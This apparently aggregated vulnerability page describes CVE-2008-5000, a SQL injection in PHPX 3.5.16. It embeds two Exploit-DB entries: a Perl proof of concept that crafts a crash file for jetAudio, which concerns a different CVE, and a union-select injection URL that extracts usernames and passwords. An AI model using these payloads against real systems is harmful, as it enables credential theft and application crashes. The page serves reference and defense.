CVE-2008-5000
published 2008-11-10CVE-2008-5000: SQL injection vulnerability in admin/includes/news.inc.php in PHPX 3.5.16, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL…
PriorityP337medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
0.95%
56.8th percentile
SQL injection vulnerability in admin/includes/news.inc.php in PHPX 3.5.16, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via uppercase characters in the news_id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpx | phpx | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
exploitdb·2009-12-25
CVE-2008-0747 jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
---
#!/user/bin/perl
# Exploit Title: [Local Crash Poc]
# Date: [Fri/Dec/25/2009]
# Author: [D3V!L FUCKER]
# Software Link: [http://www.jetaudio.com]
# Version: [jetAudio v 8.0.0.0 Basic]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";
my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "Done..!~#\n";
Exploit-DB
PHPX 3.5.16 - 'news_id' SQL Injection
exploitdb·2008-11-05
CVE-2008-5000 PHPX 3.5.16 - 'news_id' SQL Injection
PHPX 3.5.16 - 'news_id' SQL Injection
---
action = $_GET['action'];
12. $this->news_id = $_GET['news_id'];
13.
14. global $userinfo;
15. global $core;
16.
17. $this->core = $core;
18.
19. $this->userinfo = $userinfo;
20.
21.
22.
23.
24. if (!$this->userinfo){ DIE("HACK ATTEMPT"); }
25. if ($this->userinfo[news] != 1){ DIE("NO ACCESS TO THIS MODULE"); }
26.
27. include("includes/text.inc.php");
28. $this->textFun = new textFunctions();
29. $this->newsCat = $this->core->db->dbCall("news_categories");
30. if ($this->news_id == ''){ $this->news_id = $_POST['news_id']; }
31.
32. switch($this->action){
33. case "catrss":
34. $this->catRSS();
35. break;
...
i've found other bugs..:D
news.php?action=view&news_id=1 ' union all select 1,2,username,4,5,password,7,8 from users where user_id=1/*
R
No writeups or analysis indexed.
http://secunia.com/advisories/32564http://securityreason.com/securityalert/4572https://exchange.xforce.ibmcloud.com/vulnerabilities/46548https://www.exploit-db.com/exploits/6996http://secunia.com/advisories/32564http://securityreason.com/securityalert/4572https://exchange.xforce.ibmcloud.com/vulnerabilities/46548https://www.exploit-db.com/exploits/6996
2008-11-10
Published